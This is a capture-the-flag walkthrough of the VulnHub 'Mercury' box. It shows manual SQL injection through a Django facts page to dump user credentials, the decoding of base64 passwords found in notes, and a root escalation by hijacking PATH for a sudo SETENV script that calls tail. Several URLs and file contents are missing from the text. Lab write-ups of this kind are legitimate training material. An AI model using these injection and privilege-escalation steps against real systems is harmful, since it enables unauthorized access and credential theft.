Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash.

This is THE PLANETS: MERCURY from vulnhub.


This box has SSH on port 22, and HTTP on port 8080. The nmap detail scan says:

8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2


The frontpage just says:

Hello. This site is currently in development please check back later.

And robots.txt disallows the root. Viewing the page source doesn’t give any hints either, but trying to go to a page that doesn’t exist prompts a useful error:

Page not found (404)
Request Method: 	GET
Request URL:

Using the URLconf defined in mercury_proj.urls, Django tried these URL patterns, in this order:

    robots.txt [name='robots']

The current path, asdsadfc, didn't match any of these.

You're seeing this error because you have DEBUG = True in your Django settings file. Change that to False, and Django will display a standard 404 page.

So what can we learn from this? We appear to have a page at mercuryfacts, and the server is running Django (Python), with DEBUG turned on. Let’s look at mercuryfacts.

mercuryfacts has a picture of Mercury, along with links to Load a fact and a todo list. The todo list says:

Add CSS.
Implement authentication (using users table)
Use models in django instead of direct mysql call
All the other stuff, so much!!!

So we have MySQL being called directly. Sounds like SQLi.


The facts page has a URL scheme like so:

Where the number (2 in this case) can be changed to return a new fact. Putting a higher number returns an empty result:

Fact id: 10. ()

Putting something like this:’%20ORDER%20BY%201–+/

Returns a huge page of debugging information, which is very helpful. Ultimately I did this manually, with these commands: This provided all of the facts, just for interest This provided the database names - information_schema and mercury.'mercury'/ This provided the table names (we want users).'users'/ This provided the column names (username, password).

And finally this provided the data we want:,':',password)%20from%20mercury.users/

We ended up with four sets of credentials:



Ultimately only the webmaster credentials work. Enumerating the webmaster directory we find some notes, which we can grab another set of credentials from:

webmaster@mercury:~/mercury_proj$ cat notes.txt 
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
webmaster@mercury:~/mercury_proj$ echo 'bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==' | base64 -d


We can use these new credentials to su to linuxmaster.

Linuxmaster can run a script called as root, while setting an environment variable. The script runs tail without a specified path, so we can create our own tail, make it executable, and then call SETENV to our PWD while running sudo. Here’s what that looks like:

linuxmaster@mercury:~$ sudo -l
[sudo] password for linuxmaster: 
Matching Defaults entries for linuxmaster on mercury:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User linuxmaster may run the following commands on mercury:
    (root : root) SETENV: /usr/bin/

linuxmaster@mercury:~$ cat /usr/bin/
tail -n 10 /var/log/syslog

// take advantage of tail with no path by creating one - looks like this:

linuxmaster@mercury:~$ cat tail

linuxmaster@mercury:~$ chmod +x tail

linuxmaster@mercury:~$ sudo -u root PATH=./ /usr/bin/
// Guff removed

root@mercury:~# ls -lash // note we messed with PATH, so things are screwy
Command 'ls' is available in the following places
 * /bin/ls
 * /usr/bin/ls
The command could not be located because '/bin:/usr/bin' is not included in the PATH environment variable.

root@mercury:~# /bin/ls .
root@mercury:~# /bin/cat root_flag.txt 

Congratulations on completing Mercury!!!
If you have any feedback please contact me at

This wasn’t too complicated but I enjoyed it. Thanks SirFlash.